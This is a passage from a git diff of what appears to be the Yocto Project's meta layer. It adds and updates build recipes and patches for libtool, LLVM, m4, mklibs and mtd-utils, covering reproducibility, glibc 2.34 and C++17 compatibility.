++$(lt_Makefile_in): $(lt_Makefile_am) $(lt_aclocal_m4) $(lt_config_h_in)
+ 	$(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(AUTOMAKE) Makefile
+ 
+ # Don't let unused scripts leak into the libltdl Makefile
+-- 
+2.29.2
+
diff --git a/meta/recipes-devtools/libtool/libtool/lto-prefix.patch b/meta/recipes-devtools/libtool/libtool/lto-prefix.patch
new file mode 100644
index 0000000000..2bd010b8e4
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/lto-prefix.patch
@@ -0,0 +1,22 @@
+If lto is enabled, we need the prefix-map variables to be passed to the linker.
+Add these to the list of options libtool passes through.
+
+Upstream-Status: Pending
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: libtool-2.4.6/build-aux/ltmain.in
+===================================================================
+--- libtool-2.4.6.orig/build-aux/ltmain.in
++++ libtool-2.4.6/build-aux/ltmain.in
+@@ -5424,9 +5424,10 @@ func_mode_link ()
+       # --sysroot=*          for sysroot support
+       # -O*, -g*, -flto*, -fwhopr*, -fuse-linker-plugin GCC link-time optimization
+       # -stdlib=*            select c++ std lib with clang
++      # -f*-prefix-map*      needed for lto linking
+       -64|-mips[0-9]|-r[0-9][0-9]*|-xarch=*|-xtarget=*|+DA*|+DD*|-q*|-m*| \
+       -t[45]*|-txscale*|-p|-pg|--coverage|-fprofile-*|-F*|@*|-tp=*|--sysroot=*| \
+-      -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*)
++      -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*|-f*-prefix-map*)
+         func_quote_for_eval "$arg"
+ 	arg=$func_quote_for_eval_result
+         func_append compile_command " $arg"
diff --git a/meta/recipes-devtools/libtool/libtool_2.4.6.bb b/meta/recipes-devtools/libtool/libtool_2.4.6.bb
index a5715faaa9..f5fdd00e5e 100644
--- a/meta/recipes-devtools/libtool/libtool_2.4.6.bb
+++ b/meta/recipes-devtools/libtool/libtool_2.4.6.bb
@@ -1,6 +1,6 @@
 require libtool-${PV}.inc
 
-SRC_URI += "file://multilib.patch file://debian-no_hostname.patch"
+SRC_URI += "file://multilib.patch"
 
 RDEPENDS_${PN} += "bash"
 
diff --git a/meta/recipes-devtools/llvm/llvm/0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch b/meta/recipes-devtools/llvm/llvm/0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch
new file mode 100644
index 0000000000..20eea060b1
--- /dev/null
+++ b/meta/recipes-devtools/llvm/llvm/0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch
@@ -0,0 +1,31 @@
+From 86940d87026432683fb6741cd8a34d3b9b18e40d Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Fri, 27 Nov 2020 10:11:08 +0000
+Subject: [PATCH] AsmMatcherEmitter: sort ClassInfo lists by name as well
+
+Otherwise, there are instances which are identical in
+every other field and therefore sort non-reproducibly
+(which breaks binary and source reproducibiliy).
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ llvm/utils/TableGen/AsmMatcherEmitter.cpp | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/llvm/utils/TableGen/AsmMatcherEmitter.cpp b/llvm/utils/TableGen/AsmMatcherEmitter.cpp
+index ccf0959389b..1f801e83b7d 100644
+--- a/llvm/utils/TableGen/AsmMatcherEmitter.cpp
++++ b/llvm/utils/TableGen/AsmMatcherEmitter.cpp
+@@ -359,7 +359,10 @@ public:
+     // name of a class shouldn't be significant. However, some of the backends
+     // accidentally rely on this behaviour, so it will have to stay like this
+     // until they are fixed.
+-    return ValueName < RHS.ValueName;
++    if (ValueName != RHS.ValueName)
++        return ValueName < RHS.ValueName;
++    // All else being equal, we should sort by name, for source and binary reproducibility
++    return Name < RHS.Name;
+   }
+ };
+ 
diff --git a/meta/recipes-devtools/llvm/llvm_git.bb b/meta/recipes-devtools/llvm/llvm_git.bb
index a8607f5008..de92cef1a4 100644
--- a/meta/recipes-devtools/llvm/llvm_git.bb
+++ b/meta/recipes-devtools/llvm/llvm_git.bb
@@ -30,10 +30,11 @@ LLVM_DIR = "llvm${LLVM_RELEASE}"
 
 BRANCH = "release/${MAJOR_VERSION}.x"
 SRCREV = "c1a0a213378a458fbea1a5c77b315c7dce08fd05"
-SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH} \
+SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH};protocol=https \
            file://0006-llvm-TargetLibraryInfo-Undefine-libc-functions-if-th.patch;striplevel=2 \
            file://0007-llvm-allow-env-override-of-exe-path.patch;striplevel=2 \
-          "
+           file://0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch;striplevel=2 \
+           "
 
 UPSTREAM_CHECK_GITTAGREGEX = "llvmorg-(?P<pver>\d+(\.\d+)+)"
 
@@ -101,6 +102,11 @@ do_configure_prepend() {
 	sed -ri "s#lib/${LLVM_DIR}#${baselib}/${LLVM_DIR}#g" ${S}/tools/llvm-config/llvm-config.cpp
 }
 
+# patch out build host paths for reproducibility
+do_compile_prepend_class-target() {
+        sed -i -e "s,${WORKDIR},,g" ${B}/tools/llvm-config/BuildVariables.inc
+}
+
 do_compile() {
 	ninja -v ${PARALLEL_MAKE}
 }
diff --git a/meta/recipes-devtools/m4/m4-1.4.18.inc b/meta/recipes-devtools/m4/m4-1.4.18.inc
index a9b63c1bf6..6475b02f8b 100644
--- a/meta/recipes-devtools/m4/m4-1.4.18.inc
+++ b/meta/recipes-devtools/m4/m4-1.4.18.inc
@@ -9,6 +9,7 @@ inherit autotools texinfo ptest
 SRC_URI = "${GNU_MIRROR}/m4/m4-${PV}.tar.gz \
            file://ac_config_links.patch \
            file://m4-1.4.18-glibc-change-work-around.patch \
+           file://0001-c-stack-stop-using-SIGSTKSZ.patch \
            "
 SRC_URI_append_class-target = " file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
                                 file://run-ptest \
diff --git a/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch b/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch
new file mode 100644
index 0000000000..883b8a2075
--- /dev/null
+++ b/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch
@@ -0,0 +1,84 @@
+From 69238f15129f35eb4756ad8e2004e0d7907cb175 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Fri, 30 Apr 2021 17:40:36 -0700
+Subject: [PATCH] c-stack: stop using SIGSTKSZ
+
+This patch is required with glibc 2.34+
+based on gnulib [1]
+
+[1] https://git.savannah.gnu.org/cgit/gnulib.git/commit/?id=f9e2b20a12a230efa30f1d479563ae07d276a94b
+
+Upstream-Status: Pending
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ lib/c-stack.c | 22 +++++++++++++---------
+ 1 file changed, 13 insertions(+), 9 deletions(-)
+
+diff --git a/lib/c-stack.c b/lib/c-stack.c
+index 5353c08..863f764 100644
+--- a/lib/c-stack.c
++++ b/lib/c-stack.c
+@@ -51,13 +51,14 @@
+ typedef struct sigaltstack stack_t;
+ #endif
+ #ifndef SIGSTKSZ
+-# define SIGSTKSZ 16384
+-#elif HAVE_LIBSIGSEGV && SIGSTKSZ < 16384
++#define get_sigstksz()  (16384)
++#elif HAVE_LIBSIGSEGV
+ /* libsigsegv 2.6 through 2.8 have a bug where some architectures use
+    more than the Linux default of an 8k alternate stack when deciding
+    if a fault was caused by stack overflow.  */
+-# undef SIGSTKSZ
+-# define SIGSTKSZ 16384
++#define get_sigstksz() ((SIGSTKSZ) < 16384 ? 16384 : (SIGSTKSZ))
++#else
++#define get_sigstksz() ((SIGSTKSZ))
+ #endif
+ 
+ #include <stdlib.h>
+@@ -131,7 +132,8 @@ die (int signo)
+ /* Storage for the alternate signal stack.  */
+ static union
+ {
+-  char buffer[SIGSTKSZ];
++  /* allocate buffer with size from get_sigstksz() */
++  char *buffer;
+ 
+   /* These other members are for proper alignment.  There's no
+      standard way to guarantee stack alignment, but this seems enough
+@@ -203,10 +205,11 @@ c_stack_action (void (*action) (int))
+   program_error_message = _("program error");
+   stack_overflow_message = _("stack overflow");
+ 
++  alternate_signal_stack.buffer = malloc(get_sigstksz());
+   /* Always install the overflow handler.  */
+   if (stackoverflow_install_handler (overflow_handler,
+                                      alternate_signal_stack.buffer,
+-                                     sizeof alternate_signal_stack.buffer))
++                                     get_sigstksz()))
+     {
+       errno = ENOTSUP;
+       return -1;
+@@ -279,14 +282,15 @@ c_stack_action (void (*action) (int))
+   stack_t st;
+   struct sigaction act;
+   st.ss_flags = 0;
++  alternate_signal_stack.buffer = malloc(get_sigstksz());
+ # if SIGALTSTACK_SS_REVERSED
+   /* Irix mistakenly treats ss_sp as the upper bound, rather than
+      lower bound, of the alternate stack.  */
+-  st.ss_sp = alternate_signal_stack.buffer + SIGSTKSZ - sizeof (void *);
+-  st.ss_size = sizeof alternate_signal_stack.buffer - sizeof (void *);
++  st.ss_sp = alternate_signal_stack.buffer + get_sigstksz() - sizeof (void *);
++  st.ss_size = get_sigstksz() - sizeof (void *);
+ # else
+   st.ss_sp = alternate_signal_stack.buffer;
+-  st.ss_size = sizeof alternate_signal_stack.buffer;
++  st.ss_size = get_sigstksz();
+ # endif
+   r = sigaltstack (&st, NULL);
+   if (r != 0)
+-- 
+2.31.1
+
diff --git a/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb b/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
index 92d5870f42..5910f4bc70 100644
--- a/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
+++ b/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Tool for creating device nodes"
+DESCRIPTION = "${SUMMARY}"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=393a5ca445f6965873eca0259a17f833"
 SECTION = "base"
diff --git a/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch b/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch
new file mode 100644
index 0000000000..f96cc7d302
--- /dev/null
+++ b/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch
@@ -0,0 +1,431 @@
+From 597c7a8333df84a87cc48fb8477b603ffbf372a6 Mon Sep 17 00:00:00 2001
+From: Andrej Valek <andrej.valek@siemens.com>
+Date: Mon, 23 Aug 2021 12:45:11 +0200
+Subject: [PATCH] feat(cpp17): remove deprecated exception specifications for
+ C++ 17
+
+Upstream-Status: Submitted [https://salsa.debian.org/installer-team/mklibs/-/merge_requests/2]
+
+based on: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2016/p0003r5.html
+
+Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
+---
+ src/mklibs-readelf/elf.cpp      | 48 ++++++++++++++++++++---------------------
+ src/mklibs-readelf/elf.hpp      | 18 ++++++++--------
+ src/mklibs-readelf/elf_data.hpp | 36 +++++++++++++++----------------
+ 3 files changed, 51 insertions(+), 51 deletions(-)
+
+diff --git a/src/mklibs-readelf/elf.cpp b/src/mklibs-readelf/elf.cpp
+index 0e4c0f3..2e6d0f6 100644
+--- a/src/mklibs-readelf/elf.cpp
++++ b/src/mklibs-readelf/elf.cpp
+@@ -36,7 +36,7 @@ file::~file () throw ()
+     delete *it;
+ }
+ 
+-file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_error)
++file *file::open (const char *filename) throw ()
+ {
+   struct stat buf;
+   int fd;
+@@ -72,7 +72,7 @@ file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_erro
+ }
+ 
+ template<typename _class>
+-file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error)
++file *file::open_class(uint8_t *mem, size_t len) throw ()
+ {
+   switch (mem[EI_DATA])
+   {
+@@ -86,7 +86,7 @@ file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::run
+ }
+ 
+ template <typename _class, typename _data>
+-file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error)
++file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw ()
+ : file(mem, len)
+ {
+   if (mem[EI_CLASS] != _class::id)
+@@ -190,7 +190,7 @@ section_data<_class, _data>::section_data(Shdr *shdr, uint8_t *mem) throw ()
+ }
+ 
+ template <typename _class, typename _data>
+-void section_data<_class, _data>::update(const file &file) throw (std::bad_alloc)
++void section_data<_class, _data>::update(const file &file) throw ()
+ {
+   const section_type<section_type_STRTAB> &section =
+     dynamic_cast<const section_type<section_type_STRTAB> &>(file.get_section(file.get_shstrndx()));
+@@ -204,7 +204,7 @@ section_type<section_type_DYNAMIC>::~section_type() throw ()
+ }
+ 
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+   if (this->type != SHT_DYNAMIC)
+@@ -221,7 +221,7 @@ section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, ui
+ }
+ 
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw ()
+ {
+   section_data<_class, _data>::update(file);
+ 
+@@ -243,7 +243,7 @@ section_type<section_type_DYNSYM>::~section_type() throw ()
+ }
+ 
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+   if (this->type != SHT_DYNSYM)
+@@ -260,7 +260,7 @@ section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uin
+ }
+ 
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw ()
+ {
+   section_data<_class, _data>::update (file);
+ 
+@@ -285,7 +285,7 @@ const version_definition *section_type<section_type_GNU_VERDEF>::get_version_def
+ }
+ 
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+   if (this->type != SHT_GNU_verdef)
+@@ -307,7 +307,7 @@ section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header,
+ }
+ 
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw ()
+ {
+   section_data<_class, _data>::update(file);
+ 
+@@ -333,7 +333,7 @@ const version_requirement_entry *section_type<section_type_GNU_VERNEED>::get_ver
+ 
+ template <typename _class, typename _data>
+ section_real<_class, _data, section_type_GNU_VERNEED>::
+-section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data> (header, mem)
+ {
+   if (this->type != SHT_GNU_verneed)
+@@ -355,7 +355,7 @@ section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
+ }
+ 
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw ()
+ {
+   section_data<_class, _data>::update(file);
+ 
+@@ -372,7 +372,7 @@ void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &f
+ 
+ template <typename _class, typename _data>
+ section_real<_class, _data, section_type_GNU_VERSYM>::
+-section_real (Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real (Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data> (header, mem)
+ {
+   if (this->type != SHT_GNU_versym)
+@@ -399,7 +399,7 @@ segment_data<_class, _data>::segment_data (Phdr *phdr, uint8_t *mem) throw ()
+ }
+ 
+ template <typename _class, typename _data>
+-segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw (std::bad_alloc)
++segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw ()
+ : segment_data<_class, _data> (header, mem)
+ {
+   if (this->type != PT_INTERP)
+@@ -429,13 +429,13 @@ dynamic_data<_class, _data>::dynamic_data (Dyn *dyn) throw ()
+ }
+ 
+ template <typename _class, typename _data>
+-void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+   if (is_string)
+     val_string = section.get_string(val);
+ }
+ 
+-std::string symbol::get_version () const throw (std::bad_alloc)
++std::string symbol::get_version () const throw ()
+ {
+   if (verneed)
+     return verneed->get_name();
+@@ -445,7 +445,7 @@ std::string symbol::get_version () const throw (std::bad_alloc)
+   return "Base";
+ }
+ 
+-std::string symbol::get_version_file () const throw (std::bad_alloc)
++std::string symbol::get_version_file () const throw ()
+ {
+   if (verneed)
+     return verneed->get_file();
+@@ -453,7 +453,7 @@ std::string symbol::get_version_file () const throw (std::bad_alloc)
+   return "None";
+ }
+ 
+-std::string symbol::get_name_version () const throw (std::bad_alloc)
++std::string symbol::get_name_version () const throw ()
+ {
+   std::string ver;
+ 
+@@ -478,13 +478,13 @@ symbol_data<_class, _data>::symbol_data (Sym *sym) throw ()
+ }
+ 
+ template <typename _class, typename _data>
+-void symbol_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void symbol_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+   name_string = section.get_string(name);
+ }
+ 
+ template <typename _class, typename _data>
+-void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw (std::bad_alloc)
++void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw ()
+ {
+   if (!file.get_section_GNU_VERSYM())
+     return;
+@@ -531,13 +531,13 @@ version_definition_data<_class, _data>::version_definition_data (Verdef *verdef)
+ }
+ 
+ template <typename _class, typename _data>
+-void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+   for (std::vector<uint32_t>::iterator it = names.begin(); it != names.end(); ++it)
+     names_string.push_back(section.get_string(*it));
+ }
+ 
+-version_requirement::version_requirement() throw (std::bad_alloc)
++version_requirement::version_requirement() throw ()
+ : file_string("None")
+ { }
+ 
+@@ -561,7 +561,7 @@ version_requirement_data<_class, _data>::version_requirement_data (Verneed *vern
+ 
+ template <typename _class, typename _data>
+ void version_requirement_data<_class, _data>::
+-update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+   file_string = section.get_string(file);
+ 
+@@ -596,7 +596,7 @@ version_requirement_entry_data(Vernaux *vna, const version_requirement &verneed)
+ 
+ template <typename _class, typename _data>
+ void version_requirement_entry_data<_class, _data>::
+-update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+   name_string = section.get_string(name);
+ }
+diff --git a/src/mklibs-readelf/elf.hpp b/src/mklibs-readelf/elf.hpp
+index 70e61cd..afb0c9e 100644
+--- a/src/mklibs-readelf/elf.hpp
++++ b/src/mklibs-readelf/elf.hpp
+@@ -49,7 +49,7 @@ namespace Elf
+       const uint16_t get_shstrndx() const throw () { return shstrndx; }
+ 
+       const std::vector<section *> get_sections() const throw () { return sections; };
+-      const section &get_section(unsigned int i) const throw (std::out_of_range) { return *sections.at(i); };
++      const section &get_section(unsigned int i) const throw () { return *sections.at(i); };
+       const section_type<section_type_DYNAMIC> *get_section_DYNAMIC() const throw () { return section_DYNAMIC; };
+       const section_type<section_type_DYNSYM> *get_section_DYNSYM() const throw () { return section_DYNSYM; };
+       const section_type<section_type_GNU_VERDEF> *get_section_GNU_VERDEF() const throw () { return section_GNU_VERDEF; };
+@@ -59,13 +59,13 @@ namespace Elf
+       const std::vector<segment *> get_segments() const throw () { return segments; };
+       const segment_type<segment_type_INTERP> *get_segment_INTERP() const throw () { return segment_INTERP; };
+ 
+-      static file *open(const char *filename) throw (std::bad_alloc, std::runtime_error);
++      static file *open(const char *filename) throw ();
+ 
+     protected:
+-      file(uint8_t *mem, size_t len) throw (std::bad_alloc) : mem(mem), len(len) { }
++      file(uint8_t *mem, size_t len) throw () : mem(mem), len(len) { }
+ 
+       template<typename _class>
+-        static file *open_class(uint8_t *, size_t) throw (std::bad_alloc, std::runtime_error);
++        static file *open_class(uint8_t *, size_t) throw ();
+ 
+       uint16_t type;
+       uint16_t machine;
+@@ -128,7 +128,7 @@ namespace Elf
+     class section_type<section_type_STRTAB> : public virtual section
+     {
+       public:
+-        std::string get_string(uint32_t offset) const throw (std::bad_alloc)
++        std::string get_string(uint32_t offset) const throw ()
+         {
+           return std::string(reinterpret_cast<const char *> (mem + offset));
+         }
+@@ -263,10 +263,10 @@ namespace Elf
+       uint8_t get_bind () const throw () { return bind; }
+       uint8_t get_type () const throw () { return type; }
+       const std::string &get_name_string() const throw () { return name_string; }
+-      std::string get_version() const throw (std::bad_alloc);
+-      std::string get_version_file() const throw (std::bad_alloc);
++      std::string get_version() const throw ();
++      std::string get_version_file() const throw ();
+       uint16_t get_version_data() const throw () { return versym; }
+-      std::string get_name_version() const throw (std::bad_alloc);
++      std::string get_name_version() const throw ();
+ 
+     protected:
+       uint32_t name;
+@@ -305,7 +305,7 @@ namespace Elf
+   class version_requirement
+   {
+     public:
+-      version_requirement() throw (std::bad_alloc);
++      version_requirement() throw ();
+       virtual ~version_requirement () throw () { }
+ 
+       const std::string &get_file() const throw () { return file_string; }
+diff --git a/src/mklibs-readelf/elf_data.hpp b/src/mklibs-readelf/elf_data.hpp
+index 05effee..3871982 100644
+--- a/src/mklibs-readelf/elf_data.hpp
++++ b/src/mklibs-readelf/elf_data.hpp
+@@ -94,7 +94,7 @@ namespace Elf
+     class file_data : public file
+     {
+       public:
+-        file_data(uint8_t *, size_t len) throw (std::bad_alloc, std::runtime_error);
++        file_data(uint8_t *, size_t len) throw ();
+ 
+         const uint8_t get_class() const throw () { return _class::id; }
+         const uint8_t get_data() const throw () { return _data::id; }
+@@ -109,7 +109,7 @@ namespace Elf
+       public:
+         section_data(Shdr *, uint8_t *) throw ();
+ 
+-        virtual void update(const file &) throw (std::bad_alloc);
++        virtual void update(const file &) throw ();
+     };
+ 
+   template <typename _class, typename _data, typename _type>
+@@ -133,9 +133,9 @@ namespace Elf
+         typedef typename _elfdef<_class>::Shdr Shdr;
+ 
+       public:
+-        section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++        section_real(Shdr *, uint8_t *) throw ();
+ 
+-        void update(const file &) throw (std::bad_alloc);
++        void update(const file &) throw ();
+     };
+ 
+   template <typename _class, typename _data>
+@@ -147,9 +147,9 @@ namespace Elf
+         typedef typename _elfdef<_class>::Shdr Shdr;
+ 
+       public:
+-        section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++        section_real(Shdr *, uint8_t *) throw ();
+ 
+-        void update(const file &) throw (std::bad_alloc);
++        void update(const file &) throw ();
+     };
+ 
+   template <typename _class, typename _data>
+@@ -161,9 +161,9 @@ namespace Elf
+         typedef typename _elfdef<_class>::Shdr Shdr;
+ 
+       public:
+-        section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++        section_real(Shdr *, uint8_t *) throw ();
+ 
+-        void update(const file &) throw (std::bad_alloc);
++        void update(const file &) throw ();
+     };
+ 
+   template <typename _class, typename _data>
+@@ -175,9 +175,9 @@ namespace Elf
+         typedef typename _elfdef<_class>::Shdr Shdr;
+ 
+       public:
+-        section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++        section_real(Shdr *, uint8_t *) throw ();
+ 
+-        void update(const file &) throw (std::bad_alloc);
++        void update(const file &) throw ();
+     };
+ 
+   template <typename _class, typename _data>
+@@ -189,7 +189,7 @@ namespace Elf
+         typedef typename _elfdef<_class>::Shdr Shdr;
+ 
+       public:
+-        section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++        section_real(Shdr *, uint8_t *) throw ();
+     };
+ 
+   template <typename _class, typename _data>
+@@ -220,7 +220,7 @@ namespace Elf
+         typedef typename _elfdef<_class>::Phdr Phdr;
+ 
+       public:
+-        segment_real (Phdr *, uint8_t *) throw (std::bad_alloc);
++        segment_real (Phdr *, uint8_t *) throw ();
+     };
+ 
+   template <typename _class, typename _data>
+@@ -232,7 +232,7 @@ namespace Elf
+       public:
+         dynamic_data (Dyn *) throw ();
+ 
+-        void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++        void update_string(const section_type<section_type_STRTAB> &) throw ();
+     };
+ 
+   template <typename _class, typename _data>
+@@ -244,8 +244,8 @@ namespace Elf
+       public:
+         symbol_data (Sym *) throw ();
+ 
+-        void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
+-        virtual void update_version (const file &, uint16_t) throw (std::bad_alloc);
++        void update_string(const section_type<section_type_STRTAB> &) throw ();
++        virtual void update_version (const file &, uint16_t) throw ();
+     };
+ 
+   template <typename _class, typename _data>
+@@ -257,7 +257,7 @@ namespace Elf
+ 
+         version_definition_data (Verdef *) throw ();
+ 
+-        void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++        void update_string(const section_type<section_type_STRTAB> &) throw ();
+     };
+ 
+   template <typename _class, typename _data>
+@@ -269,7 +269,7 @@ namespace Elf
+ 
+         version_requirement_data (Verneed *) throw ();
+ 
+-        void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++        void update_string(const section_type<section_type_STRTAB> &) throw ();
+     };
+ 
+   template <typename _class, typename _data>
+@@ -280,7 +280,7 @@ namespace Elf
+ 
+         version_requirement_entry_data (Vernaux *, const version_requirement &) throw ();
+ 
+-        void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++        void update_string(const section_type<section_type_STRTAB> &) throw ();
+     };
+ }
+ 
+-- 
+2.11.0
+
diff --git a/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb b/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
index 1784af1f4c..07142e57e0 100644
--- a/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
+++ b/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
@@ -12,6 +12,7 @@ SRC_URI = "http://snapshot.debian.org/archive/debian/20180828T214102Z/pool/main/
 	file://avoid-failure-on-symbol-provided-by-application.patch \
 	file://show-GNU-unique-symbols-as-provided-symbols.patch \
 	file://fix_cross_compile.patch \
+	file://remove-deprecated-exception-specification-cpp17.patch \
 "
 
 SRC_URI[md5sum] = "6b6eeb9b4016c6a7317acc28c89e32cc"
diff --git a/meta/recipes-devtools/mmc/mmc-utils_git.bb b/meta/recipes-devtools/mmc/mmc-utils_git.bb
index 5fd1c5c0cd..8fe606915e 100644
--- a/meta/recipes-devtools/mmc/mmc-utils_git.bb
+++ b/meta/recipes-devtools/mmc/mmc-utils_git.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Userspace tools for MMC/SD devices"
 HOMEPAGE = "http://git.kernel.org/cgit/linux/kernel/git/cjb/mmc-utils.git/"
+DESCRIPTION = "${SUMMARY}"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://mmc.c;beginline=1;endline=20;md5=fae32792e20f4d27ade1c5a762d16b7d"
 
diff --git a/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch b/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch
deleted file mode 100644
index d43f7e1a7a..0000000000
--- a/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From 4d19bffcfd66e25d3ee74536ae2d2da7ad52e8e2 Mon Sep 17 00:00:00 2001
-From: Barry Grussling <barry@grussling.com>
-Date: Sun, 12 Jan 2020 12:33:32 -0800
-Subject: [PATCH] mtd-utils: Fix return value of ubiformat
-Organization: O.S. Systems Software LTDA.
-
-This changeset fixes a feature regression in ubiformat.  Older versions of
-ubiformat, when invoked with a flash-image, would return 0 in the case no error
-was encountered.  Upon upgrading to latest, it was discovered that ubiformat
-returned 255 even without encountering an error condition.
-
-This changeset corrects the above issue and causes ubiformat, when given an
-image file, to return 0 when no errors are detected.
-
-Tested by running through my loading scripts and verifying ubiformat returned
-0.
-
-Upstream-Status: Backport [2.1.2]
-
-Signed-off-by: Barry Grussling <barry@grussling.com>
-Signed-off-by: David Oberhollenzer <david.oberhollenzer@sigma-star.at>
-Signed-off-by: Otavio Salvador <otavio@ossystems.com.br>
----
